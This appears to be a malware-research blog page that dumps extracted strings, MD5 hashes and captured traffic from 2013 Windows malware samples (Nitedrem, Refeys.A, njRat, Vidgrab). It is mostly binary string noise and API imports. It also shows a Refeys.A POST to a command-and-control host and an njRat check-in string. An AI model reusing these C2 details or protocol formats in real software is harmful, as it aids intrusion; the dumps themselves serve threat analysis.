yyyy3Wq
33$?m[
[[[[[[
[[[[[[
lllll
[fPFMlllll
[sTtpk
_glllll
wwww
nhGFlllll
[i>wTTTTTTTTwpN
IMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
>X_l
2Xil
[>6cj0
2Aml
"' 6Hx
.LjR=W
 .Jbjx=
[[[[[Y
[[[[[[
[[[[[[[
lllll
[q~b[Fllll
ha[]dlll
nKB\`lll
[f}tttttttttt
nKG[llll
ha[llll
XwwwwwwwwwwwwwwSSSTTpNJBllll
SSSSSSSSSSSSSSTTTTTTTTT:kK^l
<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
A><<<<<<<<<<<<<<<<<<<<<<<<<<
V211111111111111111111111111
2((((((((((((((((((((((((((
|%##########################
[iix
*'5[Dj
"'/5H[DPY
._j=
! 6J[[Lj=
! 6J[[
DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
{{{{{x
{{{{{x
{{{{{x
333333333333330
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
{{{{{{{{{{{{{{0
wwwwwww
{{{{{x
733333333333333333333330?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
0?{{{{{{{{{{{{{{{{{{{{{{0?
3333333330
?{{{{{{{{{{{0
?{{{{{{{{{0
?{{{{{{{0
3333330
=m|O
P[VQP
/6!H
Y_Qi------------------------------------------snip

Unicode Strings:
---------------------------------------------------------------------------

Nitedrem strings - CRIME

August 19, 2013, 1:09 pm
$
0
0
MD5:  508af8c499102ad2ebc1a83fdbcefecb
Size: 147456







Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich
.text
`.data
.rsrc
MSVBVM60.DLL
Qs1hRsf
Qs*aQs\
Qs$FPs
uRs-
5Bs%
QstjPsh
Os0jPs
Project1
Project1
user32
VB5!
Project1
Project1
Project1
Module1
Project1
user32
CallWindowProcA
kernel32
FindResourceA
LoadResource
LockResource
SizeofResource
FreeResource
GetModuleFileNameA
RtlMoveMemory
VBA6.DLL
__vbaAryCopy
__vbaUI1I2
__vbaUbound
__vbaErrorOverflow
__vbaRedimPreserve
__vbaAryUnlock
__vbaAryLock
__vbaStrCopy
__vbaFreeStr
__vbaAryDestruct
__vbaFreeVar
__vbaStrVarMove
__vbaStrMove
__vbaSetSystemError
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaExitProc
__vbaCyI2
__vbaCyAdd
__vbaOnError
__vbaCyStr
__vbaFreeObj
__vbaHresultCheckObj
__vbaNew2
h,3@
5,3@
(SVW
PSVW
,SVW
0SVW
h\!@
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaFreeVar
__vbaStrVarMove
_adj_fdiv_m64
_adj_fprem1
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaOnError
__vbaCyAdd
_adj_fdiv_m16i
_adj_fdivr_m16i
__vbaCyStr
_CIsin
__vbaChkstk
__vbaGenerateBoundsError
__vbaCyI2
__vbaAryConstruct2
DllFunctionCall
__vbaRedimPreserve
_adj_fpatan
__vbaUI1I2
_CIsqrt
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaUbound
_CIlog
__vbaErrorOverflow
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
_adj_fdivr_m32
_adj_fdiv_r
__vbaAryLock
_CIatan
__vbaStrMove
__vbaAryCopy
_allmul
_CItan
__vbaAryUnlock
_CIexp
__vbaFreeObj
__vbaFreeStr
t:::Q:_:H:T:_:V:
:::T:N:^:V:V:::::::::::::::::::::::::::::::::::::::::::::::::::a
9::P
9::P
9::P
E9::P
L9::P
P9::P
f9::
;~:::P(
w9::Ra
C9::P
9::Pz
9::Ra
u9::P$
+9::
?9::
:::mk
8::R
.9::P
8::mhP:P:P>P:P:P:P:
8::R
8::P
D8::R
8::P
V8::
[8::
3PzR:
}8::
*8::R
;::Ra
8::P
;::P8hk
;::::
:::P
:::9
;::9+P
;::P
;::Ra
I;::
_;::9
f;::
j;::
~;::
M*lh
;::R
l;::
);::
?;::
;=:;:P:
:::R
+;::P
:::kP>ml
:::R
U:::
Z:::
u:::R
A:::P
:::R
j:::P
(:::
>:::
$:::PzR:*::
:::R
q:::
ohkilm
edac`g
ohkilm
edac`g
::::w`
:9:::>:::
:::::::z:::::::::::::::::::::::::::::::::::
:::4%
nRSI
JHU]H[W
Y[TTUN
WU^_
:::::::
hSYR
::::::::::::::::j
::v;9:,7
k::::::::
:5;1;<::
;::*:::
8:::z::*:::8::>:::;:::>::::::::
8::*::::::8:::::*::*::::*::*::::::*:::::::::::
::::
3::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::ojb
:::::
:::*:::::::>::::::::::::::
:::::
;::>::::::::::::::z::
HIHY::::*:::
8::0:::
;:::::::::::::z::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:ojb
7380
z*z?V||||F
>||||
B||||f^
Z||||
*||||~vN
||||&.
2||||b
R||||:
||||
||||
Z|||rJ
HUP_YN
v:.U<
9INOX
3q*6
D9:V
1/{-Z
A^]:
:N-u*9
j.vYz)HH
5b.n
;R[:
0---------------------------------------snip
Ebjnjim
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::,7
k9:::8:9:
9:::
4:::b;:
*:::
::::,7
k9:::::;:_:::j::
::::,7
k9:::::;:>2::R:::
>::::::::::,7
k9:::::;:_:::
::::,7
k9:::::;:>2::
58::L::
>::::::::::,7
k9:::::9:
O::2;:
::::,7
k9:::::;:::::
>::::::::::,7
k9:::::;:::::
;::&
>::::::::::,7
k9:::::;:::::r;::2
>::::::::::,7
k9:::::;:;:::J;:
::::,7
k9:::::;:::::
>::::::::::,7
k9:::::;:;:::
::::,7
k9:::::;:>2::
;::R
>::::::8:y:q:8:n:k:
:::z:::;:;::::::;::::::::::::::::::::::
:::z:::;:>:::::
8::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=J::::::::::
=MJ::::::2
=MMJ::::
=MJ:::::
=J::::::
::::::::
::::::::
::::::::
::::::::
::::::::
::::::::
::::::::
::::::::
::::::::::
::::::::
::::::::::::
::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::*:::
:::;:>:::::
:::::::::::::::::::::::::
:::::::::::::::::::::::::::::2
M:::2
MJ:5
J::5
:::5
:::5
::::5
::::4
::::4
:::::::::::::::::::::::::::::::::::::
8:::;:9:
8:;:;:
*:;:>:
O***:;:>:
:::l:i:e:l:
:h:i:s:u:t:e:s:t:|:u:::::
::;:::;:::::::;:::::::::::::>:::;:::::::::::::::~:::::l:[:H:|:S:V:_:s:T:\:U:::::
:>:::n:H:[:T:I:V:[:N:S:U:T:::::>2
;::;:i:N:H:S:T:]:|:S:V:_:s:T:\:U:::*;::;:
:(:;:j:H:U:^:O:Y:N:t:[:W:_:::::j:H:U:P:_:Y:N:
:::::
:0:;:|:S:V:_:l:_:H:I:S:U:T:::::
:::::
:0:;:j:H:U:^:O:Y:N:l:_:H:I:S:U:T:::
:::::
:0:;:s:T:N:_:H:T:[:V:t:[:W:_:::I:N:O:X:::::
:(:;:u:H:S:]:S:T:[:V:|:S:V:_:T:[:W:_:::I:N:O:X:
:_:B:_:::::::::::::::::
8:::::::::::::
8:::::::::::::::::::::
8:::::
::::q
~vv:wilxlw
~vv:::vU[^vSXH[HC{::}_NjHUY{^^H_II::lSHNO[VjHUN_YN::
BSNjHUY_II:::::::::::::::::::::::P
1u
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING

Unicode Strings:
---------------------------------------------------------------------------
@*\Ac:\Project1.vbp
1000000
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904B0
ProductName
Project1
FileVersion
1.00
ProductVersion
1.00
InternalName
Project1
OriginalFilename
Project1.exe

Refeys.A strings - CRIME

August 21, 2013, 9:42 am
$
0
0
Traffic

POST /sys.php HTTP/1.0
Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer:  http://www.gmail.com
Content-length: 112



File: Refeys.A_BEDE0DA1ABC1122ACF8AF91F6D6B289F.exe_
MD5:  bede0da1abc1122acf8af91f6d6b289f
Size: 58880


Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.sxdata
.rsrc
@.reloc
15:~@
5]}@
-------------------snip
@_^[]
CRYPT32.dll
CertAddCRLContextToStore
CertAddCRLLinkToStore
CertAddCTLContextToStore
CertAddCTLLinkToStore
CertAddCertificateContextToStore
CertAddCertificateLinkToStore
CertAddEncodedCRLToStore
CertAddEncodedCTLToStore
CertAddEncodedCertificateToStore
CertAddEncodedCertificateToSystemStoreA
CertAddEncodedCertificateToSystemStoreW
CertAddEnhancedKeyUsageIdentifier
CertAddSerializedElementToStore
CertAddStoreToCollection
CertAlgIdToOID
CertCloseStore
CertCompareCertificate
CertCompareCertificateName
CertCompareIntegerBlob
CertComparePublicKeyInfo
CertControlStore
CertCreateCRLContext
CertCreateCTLContext
CertCreateCTLEntryFromCertificateContextProperties
CertCreateCertificateChainEngine
CertCreateCertificateContext
CertCreateContext
CertCreateSelfSignCertificate
CertDeleteCRLFromStore
CertDeleteCTLFromStore
CertDeleteCertificateFromStore
CertDuplicateCRLContext
CertDuplicateCTLContext
CertDuplicateCertificateChain
CertDuplicateCertificateContext
CertDuplicateStore
CertEnumCRLContextProperties
CertEnumCRLsInStore
CertEnumCTLContextProperties
CertEnumCTLsInStore
CertEnumCertificateContextProperties
CertEnumCertificatesInStore
CertEnumPhysicalStore
CertEnumSubjectInSortedCTL
CertEnumSystemStore
CertEnumSystemStoreLocation
CertFindAttribute
CertFindCRLInStore
CertFindCTLInStore
CertFindCertificateInCRL
CertFindCertificateInStore
CertFindChainInStore
CertFindExtension
CertFindRDNAttr
CertFindSubjectInCTL
CertFindSubjectInSortedCTL
CertFreeCRLContext
CertFreeCTLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCRLFromStore
CertGetCTLContextProperty
CertGetCertificateChain
CertGetCertificateContextProperty
CertGetEnhancedKeyUsage
CertGetIntendedKeyUsage
CertGetIssuerCertificateFromStore
CertGetNameStringA
CertGetNameStringW
CertGetPublicKeyLength
CertGetStoreProperty
CertGetSubjectCertificateFromStore
CertGetValidUsages
CertIsRDNAttrsInCertificateName
CertIsValidCRLForCertificate
CertNameToStrA
CertNameToStrW
CertOIDToAlgId
CertOpenStore
CertOpenSystemStoreA
CertOpenSystemStoreW
CertRDNValueToStrA
CertRDNValueToStrW
CertRegisterPhysicalStore
CertRegisterSystemStore
CertRemoveEnhancedKeyUsageIdentifier
CertRemoveStoreFromCollection
CertResyncCertificateChainEngine
CertSaveStore
CertSerializeCRLStoreElement
CertSerializeCTLStoreElement
CertSerializeCertificateStoreElement
CertSetCRLContextProperty
CertSetCTLContextProperty
CertSetCertificateContextPropertiesFromCTLEntry
CertSetCertificateContextProperty
CertSetEnhancedKeyUsage
CertSetStoreProperty
CertStrToNameA
CertStrToNameW
CertUnregisterPhysicalStore
CertUnregisterSystemStore
CertVerifyCRLRevocation
CertVerifyCRLTimeValidity
CertVerifyCTLUsage
CertVerifyCertificateChainPolicy
CertVerifyRevocation
CertVerifySubjectCertificateContext
CertVerifyTimeValidity
CertVerifyValidityNesting
ChainWlxLogoffEvent
CloseCertPerformanceData
CollectCertPerformanceData
CreateFileU
CryptAcquireCertificatePrivateKey
CryptAcquireContextU
CryptBinaryToStringA
CryptBinaryToStringW
CryptCloseAsyncHandle
CryptCreateAsyncHandle
CryptCreateKeyIdentifierFromCSP
CryptDecodeMessage
CryptDecodeObject
CryptDecodeObjectEx
CryptDecryptAndVerifyMessageSignature
CryptDecryptMessage
CryptEncodeObject
CryptEncodeObjectEx
CryptEncryptMessage
CryptEnumKeyIdentifierProperties
CryptEnumOIDFunction
CryptEnumOIDInfo
CryptEnumProviders
GetVersion
VirtualAlloc
GetCurrentProcessId
IsBadCodePtr
GetDiskFreeSpaceW
GetSystemTimeAsFileTime
GetSystemDirectoryA
lstrcmpi
FileTimeToSystemTime
lstrcpy
GetModuleHandleA
SleepEx
SetCurrentDirectoryW
CreateThread
CreateDirectoryA
GetExpandedNameA
GetThreadPriority
WinExec
KERNEL32.DLL
CreateWindowExW
SetWindowLongA
GetFocus
IsDlgButtonChecked
GetMenuStringW
CreateDialogParamA
GetForegroundWindow
CreateMenu
CreateDialogIndirectParamW
SetActiveWindow
wvsprintfW
DialogBoxIndirectParamW
GetClassInfoExW
GetTopWindow
SetWindowLongW
USER32.DLL
VarDecFromI1
VarUI8FromUI2
VarDecSub
VarCyFromR4
VarR8FromDate
OleLoadPictureEx
VarDateFromI8
VarDecFromCy
VarDateFromUI4
VarDateFromI1
VarDecCmp
VarR8FromDec
VarI2FromUI8
VarRound
RegisterTypeLib
VarDecFromUI8
VarUI8FromDate
VarDateFromStr
VarR8Pow
VarUI1FromBool
VarI4FromR4
VarDateFromUdate
VarBstrFromUI2
VarImp
DispGetIDsOfNames
VarCySub
GetVarConversionLocaleSetting
oleaut32.dll
CreateEllipticRgn
TranslateCharsetInfo
CreateFontW
CreateICW
gdi32.dll
m6<g
&3m&m&
IXPh
m&m&
h<-6<5
m&m&m&
 V t 
h<Skk
(yy_FF/
sSc$
m&m&V
GFZO
K.c$
sS0s
sSSG
6psS
qH'z
WqHsz
xESSSH
h<Sm&m&m&
h<m&
Vm&o
oSSS
op2SS
DSSSHw
2SSH
sSc$
RGec$
H'zF
m&m&m&
bYSSS
__Gu
szc$
%HSSS.
gsSSSW
q*tN^
26vR
t6vR
SSS|a
SSS|
SSS|j^t
g>SSS
g8SSSW
gNSSS
?RRt6
mz<<kkk
&m5<
m&m&
m&m&
&m&m&m&Nih
kpCVBnunGZBMPGgvkEyVipix
.8#&,&->@-)+;=5+3*:!5Xepewehypus
ANDUWfypr
?'47+3=8/<13%+6'60%)
tdDDTWrZnHdYSypnZgYEGg
gJhfNYlTlPxCC,:6&2">.!/*>,.
?1(&+*36=D
!-#;!/;('
mUfGKUjIaEFCGZVKC
Domec
/$%?OsLJyG0:()/)@6#.@9=:
=;:'&:
$!#&@6.>
Pff0}
2&<9&&9)3?+>
$911:4:>(1)5'4'BZa
"?;?
,1! ---------------------snip
RJk&ZJk<ORk
Y<33<Y
########
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
@jjjj
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Bitet
Jebo
Coposa
VS_VERSION_INFO
StringFileInfo
04090000
LegalCopyright
fLiqjPPlr
CompanyName
Yaldex Software
FileVersion
0.9.7.7
VarFileInfo
Translation

njRat / Backdoor.LV strings - APT

August 22, 2013, 9:17 pm
$
0
0


C2 checkin
lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'|Examiner|'|'|2013-06-21|'|'|USA|'|'|Win XP ProfessionalSP2 x86|'|'|No|'|'|0.5.0E|'|'|..|'|'|Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXB hZA==|'|'|[endof]act|'|'| Y3B0YnRfUHJvY2Vzc19SZWdpc3RyeV9GaWxlX0luZm8ubG9nIC0gTm90ZXBhZA==

File: njRAt_1D3BAEDD747F6F9BF92C81EB9F63B34B
MD5:  1d3baedd747f6f9bf92c81eb9f63b34b
Size: 110080







Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
.text
`.sdata
.rsrc
@.reloc
BSJB
v2.0.50727
#Strings
#GUID
#Blob
wLoader
<Module>
aMFlARt1Q2Bj1GVfZb
TD4myOW8ixbVmc0wCF
Object
System
mscorlib
fQYL7B84mmJRdrU3KK
GfSviSAGX5kNVrRoZY
aFguFaGnjXmFgmttaZ
ValueType
RUej1ecCdtNqx4qyoM
guN1kS1eOL6oGKDdfE
qTLWMJmEALehonqjh3
WRCy8fERBet5ywu0Kk
sdZpRUVSS7koDSkkEh
f66BTcSdkEN4CEx3t9
EdNNrCxD0HPEKJXTqU
cPPppT6E99CCcPIf6S
xhBRQknOm7ZDQSrnwO
MNIggEySGpHlVvbxVb
a7kQPSIYJdDIMumlgB
qpZ9r73GjGh2QOug7o
dxM2gVhfcEpIBZpCwk
DYcOPVvOJfyvEp1xkV
sbY9iqoWovmWWJ0nUM
RuDD0QLOk5emcZN8wg
DObaIugU0tWLbjpFmw
GaUC5HQsYK5prBvdTs
.cctor
Void
Int32
JFaSnjXmF
Char
tmtxtaZPU
yj16eCdtN
String
Sx4nqyoM1
JN1ykSeOL
moGIKDdfE
qTL3WMJEA
sehhonqjh
ITfjAvlKX
ResolveEventHandler
.ctor
IntPtr
AssemblyName
System.Reflection
CKxtUKuut
Assembly
ResolveEventArgs
GjMWFlAR1
Stream
System.IO
DeflateStream
System.IO.Compression
BinaryReader
CompressionMode
IDisposable
Dispose
u2B8j1GVf
NblAD4myO
Byte
dixGbVmc0
ACFccQYL7
AppDomain
S4m1mJRdr
H3KmKbfSv
MemoryStream
DSGEX5kNV
Evidence
System.Security.Policy
wRoVZYdFg
paRvCy8fR
Seto5ywu0
l3tX9kdNN
Boolean
zkoLdZpRU
kS7gkoDSk
Type
EEhQG66BT
gdk4EN4CE
OIgCgESGp
wCDr0HPEK
UXTeqUWPP
RuntimeFieldHandle
Dictionary`2
System.Collections.Generic
set_Item
ContainsKey
FpTFE99CC
gPIKf6Srh
SRQwkOm7Z
AQSDrnwOZ
Array
XlVfvbxVb
a7kiQPSYJ
Encoding
System.Text
aDIkMumlg
ShppZ9r7G
aGhb2QOug
Vo85xM2gV
U0nTUMquD
A0QZOk5em
fZNY8wgfO
GaINuU0tW
CcEUpIBZp
CwkMiYcOP
jOJufyvEp
gxk0VLbY9
DqWRovmWW
Monitor
System.Threading
Exit
tbj2pFmwb
WUCO5HsYK
HprPBvdTs
kYaq7siC4
o6lBweZhC
RuntimeTypeHandle
ocwltVChh
EKjJySowb
uCS761TpG
nrqaYDHku
AxbsJWV5c
wu3H1bo1v
X0H9Jljie
dnazyPxpw
R3wjdfxfni
aT4jj0s3ah
add_ResourceResolve
jtIjt1KKdl
Convert
ToBase64String
a0kjWSQ0uD
get_Default
g2Hj8OOgZD
get_Evidence
ayLjAIClxx
get_Name
px5jGJrLDg
get_CurrentDomain
goxjcb5MhH
add_AssemblyResolve
TX5j1lm2m1
Load
u43jm9xksu
GetExecutingAssembly
agnjE8tCcs
MOQjVy6O5F
SQHjSsn9Ta
VkqjxNRl1s
BgVj6XlEda
v4sjnqjyHh
Write
qmGjy1grJG
ReadInt32
BO7jIyv5sV
ExecuteAssemblyByName
F35j3joZVJ
wLTjhXpY8U
SetData
Uyfjvx24AE
ToArray
vofjoVxSNa
Concat
RoTjLBF0qa
GetBytes
fdajgqJRhS
GetData
HCJjQEJ15S
Read
dwOj4beDhk
Enter
YVojXRKUic
GetTypeFromHandle
uIejrjpqIe
ReadBytes
MyMjeCViWv
ToLowerInvariant
ifsjFCCE4D
GetManifestResourceNames
RVsjKwdaRU
RuntimeHelpers
System.Runtime.CompilerServices
InitializeArray
BBSjw85Zv7
GetManifestResourceStream
wLoader.g.resources
STAThreadAttribute
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
_CorExeMain
mscoree.dll
s!rqkbtfe)ijbca{0sw3f`x7qw:_SN>rOEG
()*+,-.
k;<=>?@AB
DGgLIAJK
MNORQRSTUV
YZ[|]^_`abcd%fgHijknmnkpqrstuvsxyz{|}~
 !"#$%&
\LR_,-.
9:;>=>?@ABCDEFGHIJkLM.a"4><7UV[XYZ[
]^_babc
efghijklmnopqr3tu4wxyz{|}~
+)?|
P`Re_,{
32V4
Jr@`B
u------------------------------snip
&h,!
usxx
j7oml6-
OzVZAB
.SLk^-.g
/!0$R9
}x}t{
t_ru
xEt_
VcSM
+F=4
6&0.v,QK
pVsbqw
mLkw
bQfg
|F1`
+8<:
s5$-
~e`d
}i0nno
hc6drCqaa
LMUAI
/*M(qj
(%F'
|>}q
a^_\M\W
ypzsVySoNVlJ
29p'
A{1fz
@s{qrG\
n`hx
I-Tc
91?nR5<z
7#:W;|6
rm'a
S6QT
2H!B
Sl<*($
-##u
q+5vC);{
k?(s
]BU,S{
N]gu
D`EL
=>t83v1
<a 7
BDBR
;Mx+f6x
ypwq
3/*vP*D):
&a%6q
l@;~
yzvtLsUcpk.j(&jm(e
/u`[6]POZ]
VKPMnLF
W@=^>
{(9:
.)L*L
S*ve
p3r?0f
j,k^
T#SC
N]L-
HCFL
 0.*-WC*!
uc2{
-jKoqhy
5SVQW
O]LO
CbAH
n0/w-@**
=$ck'
c%dzvQ`O
V]t[*0RoNL
B[Ca
70e<3
Ws:*11
}Czl
s|pnv
lakyha
eHcral
S^QT
M9YKN
FVnS
8~=
?w W49
&f%T#(I"?
|Q:qywtUv
hvjh
8x7y
avy|
mR,d
]dQ[YZ7
k-<-j)\'1
 c"m
oDX}
o"/s
8Kk/
Xm6u
0|[oa,yZo:g@
d@_:
XIXx
xjFv$
P|S=M
>?;ij'6|4(r
.+'!.o&i
:P(y
'T5Z
SvCYfG
y}~]
YZnr5
E:BrC#
x%Vcc]
%.Jhkncb]
0JOPSSjbb^\
2FGGJOOQRjna[
%%7FFDGJNORhjn[
88DFFJNOSjqXC
88FDJOgr
888DGOh
!78FGJo
8DDM
!8GY
%8DDq
8888
GDD.;
UcF@
----------------snip
Y@5@

Unicode Strings:
---------------------------------------------------------------------------

Vidgrab strings - APT

September 2, 2013, 8:39 pm
$
0
0
File: DW20.exe
MD5:  588d3316d4bbfdbb25658d436f06ed96
Size: 118784







!This program cannot be run in DOS mode.
]{@
Rich
.text
`.rdata
@.data
.rsrc
@ANu-------------------snip
@3@
p3@
Sleep
GetTickCount
VirtualFreeEx
CloseHandle
GetModuleFileNameA
CreateFileA
SetSystemTime
GetLocalTime
GetCurrentThreadId
ResumeThread
GetStartupInfoA
GetVersion
KERNEL32.dll
GetMessageA
PostThreadMessageA
GetInputState
USER32.dll
ADVAPI32.dll
SHSetValueA
SHDeleteValueA
SHLWAPI.dll
memset
__CxxFrameHandler
_except_handler3
strcat
??3@YAXPAX@Z
??2@YAPAXI@Z
memcpy
memcmp
fclose
fwrite
fopen
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
GetModuleHandleA
XY`XX
X[XXX\Z\
X[[
[]W\VH
ZHVG
yXX
01+x(*7?*9XX5x;9667,x:=x*-6xXX16x
x57<=vUUR|[\Zd[[
\ZH
\Pw
\ZP
ZPe
x\@e
YZH
1;0[
W\[H
Y\8XXa
[H[\
XVySY^XX
PZVRZ\Z[
MZ]HZ\xZ\XXHZZ
XXZMx[JKp[PX
Z^^UZGZUZmZ[[k[
\l]JX8{XX
ZT8yXX<ZPW[
^PHJ)
PUWQWHRHZ
RWWSv,= ,
YZM
ZO\[Z
8v*<9,9
{UZI|IT\GP]Z
&XhZC[P\
ZT^[Zp
v*=47;XX
@YZMZIK
XJZTR[ZO
RWWSWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWPWHWHWH\H
NXH
m@xXH[#dXP
0XJ
^XX
P-@^y
^LW
THY
.yXX
uZhZu
',XJH+V0X
ZBX[-P
fXW^h
[TZ
MDZ
XO_Kx_KW
\oKXZ
,]W
_XI
MpZ
/xz
lJrW
Z^W
Z^[
aIW
[7XH
Zx>
^Xx
WXX[
ZPY>XX
XH-S
H>YH
f[Jx-^>ZK
[Uh
X-_ZTYH
{[V
zhHZ
L.2XH
M|Z
XZX
2YX\[
iXH
wJXH
jXHX
Z_YZ
0zY
[^MXZ=
|P\\&H[o[
cZH$
Y8{
ZXX
ZS{
]4Zg
e[^Y
HhXH0XZ0
XZ`
MLZ*d^,XX|
0HiXH
0Z8
Z|Z
rZ|7
ZlW
_r-F
vZ/9Z_T
.Kq
\ZUZ
]Kr
MeZ
eIIK
e8ZH
e<Z^
]0Z^
[Xx8X
MdZ
RNhZU`ZU
@0>J
ZW\ZWc
0@ZSj:k_
ZNTZ
a\a-K0
MHZK
!LZ
L[@Y
)xZ
-wW8Z
]8T
YQP:2Y
TX[g
.KZ
}lZ
XZY
z5T<
}ZSX
Hp4|T
eX:
z'*L
[Tu[]
Y\@+
YXY
-Va]
\(Jj&v
U[P
U,ZA-g0
$[M\k
[V0\|
 ZE
eZ<a\
PXh
U[z
`XX
JlMk
-P\Q
Z-z
Z%Z=Q
ZQTZQ
}x[
[Hf
T-TZ@o
[-~[}
%TX,I_
PZF
ZcM
[Tb]TPyXH
vZTJ@W[WHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
zXX
Z\[K
ZP&Z\(Z\8Z\
Z\dZ\DZ\rZ\[|b{XX
ZTH
CZPDZ\jZ\
Z\[x
ZD[Px]
YZI
ZPZ_P[z
ZQPMZQ
[t[\
VhZCX8
Zx[p
ZP[D_\
\C[t[\
Vh[E
[p`ZP
-[D_\W
_@[t[\
Vh[x+
[T[\
ZLX
L[P[}Z\
ZT:*
Rp~J8jJZFW[XXG
XX [
1*,-94
*==X
YXX
*7;
<<*=++XXXX
79<
1:*9*!
XXZ
/[z
7<-4=
96<4=ZL-qX_
=*+176XX
Xx[
4==(XvX
47+^nX
kjv<44XXaZ
=*.1;=
,9,-Z"YX
=?1+,=*^A
,*4],*Xy
Y4-Z
ZE\
  ^
^#*X
Z/;+,75:Z>
Z+,*6;(!X
\mHxX
Z>KWXWY
161,Z
5XHX
Z59]
9<2-+,
<1.M
{t_\
KXX
ZPXX
.;07+,\5^
91Ju]
W^WHWHWHWHVHSoftwX
are\rar
WYWHWHWHWHWHWHWH
YWHWHWHWHWHWHWHZH
*=9,=L
0Z_<K{
=*6=4
[JW\WHWH
OWHWHWHWHWHWHWHWHWH^H
